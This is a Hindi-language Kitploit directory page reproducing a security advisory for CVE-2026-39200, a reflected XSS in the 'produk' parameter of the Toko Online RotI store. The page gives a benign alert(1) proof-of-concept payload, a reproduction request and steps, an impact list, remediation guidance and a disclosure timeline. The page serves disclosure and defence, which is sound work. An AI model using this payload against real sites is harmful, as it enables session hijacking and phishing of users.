Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39200 — produk अनुरोध पैरामीटर का मान एक HTML टैग विशेषता के मान में कॉपी किया जाता है जो दोहरे उद्धरण चिह्नों में संलग्न है। पेलोड xbnw0"><script>alert(1)</script>skc2h produk पैरामीटर में प्रस्तुत किया गया था। यह इनपुट एप्लिकेशन के प्रतिक्रिया में xbnw0\"><script>alert(1)</script>skc2h के रूप में प्रतिध्वनित किया गया था। | Kitploit
उपकरण/GitHubGitHub/r00tali/cve-2026-39200
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubr00tali/cve-2026-39200

CVE-2026-39200

रिपॉजिटरी देखें
131 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

produk अनुरोध पैरामीटर का मान एक HTML टैग विशेषता के मान में कॉपी किया जाता है जो दोहरे उद्धरण चिह्नों में संलग्न है। पेलोड xbnw0"><script>alert(1)</script>skc2h produk पैरामीटर में प्रस्तुत किया गया था। यह इनपुट एप्लिकेशन के प्रतिक्रिया में xbnw0\"><script>alert(1)</script>skc2h के रूप में प्रतिध्वनित किया गया था।

साझा करें

CVE-2026-39200 — रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) Toko Online RotI में

सारांश

एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता Toko Online RotI वेब एप्लिकेशन के produk अनुरोध पैरामीटर में पहचानी गई थी। एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को HTML-एनकोड करने में विफल रहता है, इससे पहले कि इसे एक HTML टैग विशेषता के अंदर प्रतिबिंबित किया जाए जो दोहरे उद्धरण चिह्नों में संलग्न है। एक हमलावर एक दुर्भावनापूर्ण URL बना सकता है, जिस पर पीड़ित द्वारा विज़िट किए जाने पर, पीड़ित के ब्राउज़र सत्र के संदर्भ में मनमाना JavaScript निष्पादित होता है।

फ़ील्डमान
CVE IDCVE-2026-39200
भेद्यता प्रकारCWE-79 — वेब पृष्ठ निर्माण के दौरान इनपुट का अनुचित तटस्थीकरण (रिफ्लेक्टेड XSS)
प्रभावित उत्पादToko Online RotI (इंडोनेशियाई ऑनलाइन स्टोर)
प्रभावित पैरामीटरproduk
खोजकर्ताUzair Ali (r00tali) — प्रवेश परीक्षक / बग बाउंटी हंटर
खोज तिथि2026-07-03
CVE निर्दिष्ट2026-07-12
सलाह प्रकाशित2026-07-19

भेद्यता विवरण

produk अनुरोध पैरामीटर को दोहरे उद्धरण चिह्नों में संलग्न HTML टैग विशेषता के मान में शब्दशः कॉपी किया जाता है। क्योंकि एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को प्रतिबिंबित करने से पहले HTML-एनकोड नहीं करता है, एक हमलावर एक पेलोड सबमिट करके विशेषता से बाहर निकल सकता है जिसमें एक समापन दोहरा उद्धरण और उसके बाद HTML/JavaScript पेलोड शामिल होता है।

प्रूफ-ऑफ-कॉन्सेप्ट पेलोड

root@kitploit:~
xbnw0"><script>alert(1)</script>skc2h

जब यह पेलोड produk पैरामीटर के रूप में सबमिट किया जाता है, तो एप्लिकेशन इनपुट को प्रतिक्रिया में अनएस्केप्ड रूप में वापस भेजता है। समापन "> मूल विशेषता को समाप्त करता है, और इंजेक्ट किया गया <script>alert(1)</script> ब्लॉक ब्राउज़र द्वारा एक नए HTML तत्व के रूप में व्याख्या किया जाता है, जो उपयोगकर्ता के सत्र में मनमाना JavaScript निष्पादित करता है।

भेद्य पैटर्न (अवधारणात्मक)

भेद्य HTML प्रतिक्रिया इस प्रकार दिखती है:

root@kitploit:~
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />

<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
                                                            ^^^^^^^^^^^^^^^^^^^^^^^^
                                                            Browser executes this

HTTP अनुरोध (पुनरुत्पादन)

root@kitploit:~
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0

HTTP प्रतिक्रिया (अंश)

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<html>
  <body>
    <!-- ... -->
    <input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
    <!-- ... -->
  </body>
</html>

पुनरुत्पादन चरण

  1. Toko Online RotI एप्लिकेशन में एक एंडपॉइंट की पहचान करें जो produk पैरामीटर को HTML विशेषता के अंदर प्रतिबिंबित करता है (जैसे, उत्पाद खोज, विवरण, या फ़िल्टर पृष्ठ)।
  2. produk पैरामीटर मान को निम्नलिखित पेलोड से बदलें:
    root@kitploit:~
    xbnw0"><script>alert(1)</script>skc2h
    
  3. सर्वर को अनुरोध सबमिट करें।
  4. सर्वर की प्रतिक्रिया का निरीक्षण करें। पेलोड को विशेषता के अंदर बिना किसी संशोधन के वापस भेजा जाता है, " से बाहर निकलकर DOM में एक मान्य <script> तत्व उत्पन्न करता है।
  5. किसी भी आधुनिक ब्राउज़र में तैयार प्रतिक्रिया लोड करें। एक JavaScript alert(1) संवाद प्रदर्शित होता है, जो पीड़ित के सत्र में मनमाना JavaScript निष्पादन की पुष्टि करता है।

प्रभाव

इस रिफ्लेक्टेड XSS के सफल शोषण से हमलावर निम्नलिखित कर सकता है:

  • सत्र कुकीज़ और प्रमाणीकरण टोकन चुराना, जिससे खाता अधिग्रहण होता है।
  • प्रमाणित उपयोगकर्ताओं की जानकारी के बिना उनकी ओर से कार्रवाई करना।
  • उपयोगकर्ताओं को दुर्भावनापूर्ण साइटों पर रीडायरेक्ट करना (फ़िशिंग / क्रेडेंशियल हार्वेस्टिंग)।
  • एप्लिकेशन में दुर्भावनापूर्ण सामग्री इंजेक्ट करना (विकृतीकरण)।
  • पीड़ित द्वारा सबमिट किए गए कीस्ट्रोक्स और फॉर्म डेटा कैप्चर करना।
  • ड्राइव-बाय मैलवेयर वितरण के लिए ब्राउज़र भेद्यताओं का शोषण करना।
  • उपयोगकर्ता और एप्लिकेशन डोमेन के बीच विश्वास संबंध का दुरुपयोग करना।

चूंकि भेद्यता प्रतिबिंबित है, शोषण के लिए केवल पीड़ित द्वारा एक तैयार लिंक पर क्लिक करने की आवश्यकता होती है, जिससे फ़िशिंग अभियानों में इसे आसानी से हथियार बनाया जा सकता है।

CVSS v3.1 (अनुमानित): 6.1 (मध्यम) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


उपचार

इस भेद्यता को ठीक करने के लिए, विक्रेता को चाहिए:

  1. HTML आउटपुट में प्रतिबिंबित होने से पहले सभी उपयोगकर्ता द्वारा प्रदान किए गए मानों को HTML-एनकोड करें। विशेष रूप से <, >, ", ', और & को एनकोड करें (जैसे, &lt;, &gt;, &quot;, &#x27;, &amp;)।
  2. मैन्युअल संयोजन के बजाय फ्रेमवर्क के अंतर्निहित आउटपुट-एनकोडिंग हेल्पर्स का उपयोग करें। उदाहरण:
    • PHP: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
    • ASP.NET: HttpUtility.HtmlEncode(input) या <%: %> सिंटैक्स
    • Python (Jinja2): {{ input }} (डिफ़ॉल्ट रूप से ऑटो-एस्केप)
  3. किसी भी शेष इंजेक्शन के प्रभाव को सीमित करने के लिए एक सख्त Content-Security-Policy (CSP) प्रतिक्रिया हेडर सेट करें:
    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    
  4. सभी सत्र कुकीज़ पर HttpOnly और Secure फ़्लैग सेट करें ताकि JavaScript उन्हें पढ़ने से रोका जा सके।
  5. produk पैरामीटर को अपेक्षित उत्पाद पहचानकर्ताओं (संख्यात्मक आईडी, स्लग, आदि) की एक अनुमति-सूची के विरुद्ध मान्य करें और जो कुछ भी मेल नहीं खाता है उसे अस्वीकार करें।
  6. प्रतिक्रिया निकायों की MIME-प्रकार सूँघने को रोकने के लिए X-Content-Type-Options: nosniff जोड़ें।

प्रकटीकरण समयरेखा

तिथिघटना
2026-07-03अधिकृत सुरक्षा परीक्षण के दौरान भेद्यता की खोज
2026-07-03cveform.mitre.org के माध्यम से MITRE से CVE ID का अनुरोध
2026-07-12MITRE असाइनमेंट टीम द्वारा CVE-2026-39200 निर्दिष्ट
2026-07-19सार्वजनिक सलाह प्रकाशित

खोजकर्ता

** Uzair Ali (r00tali)** — प्रवेश परीक्षक / बग बाउंटी हंटर / सुरक्षा शोधकर्ता

  • GitHub: https://github.com/r00tali

संदर्भ

  • OWASP — क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • CWE-79: वेब पृष्ठ निर्माण के दौरान इनपुट का अनुचित तटस्थीकरण
  • PortSwigger — रिफ्लेक्टेड XSS
  • MITRE CVE रिकॉर्ड — CVE-2026-39200

अस्वीकरण

यह सलाह केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रकाशित की गई है। भेद्यता को MITRE CVE असाइनमेंट टीम के माध्यम से जिम्मेदार प्रकटीकरण प्रक्रिया के द्वारा रिपोर्ट किया गया था। कोई गोपनीय विक्रेता जानकारी, ग्राहक डेटा, या मालिकाना कोड का खुलासा नहीं किया गया है। प्रूफ-ऑफ-कॉन्सेप्ट एक सौम्य alert(1) पेलोड का उपयोग करता है और इसका उद्देश्य बग के अस्तित्व को प्रदर्शित करना है, न कि लाइव सेवा के खिलाफ हमलों को सुविधाजनक बनाना।

टूल डाउनलोड करें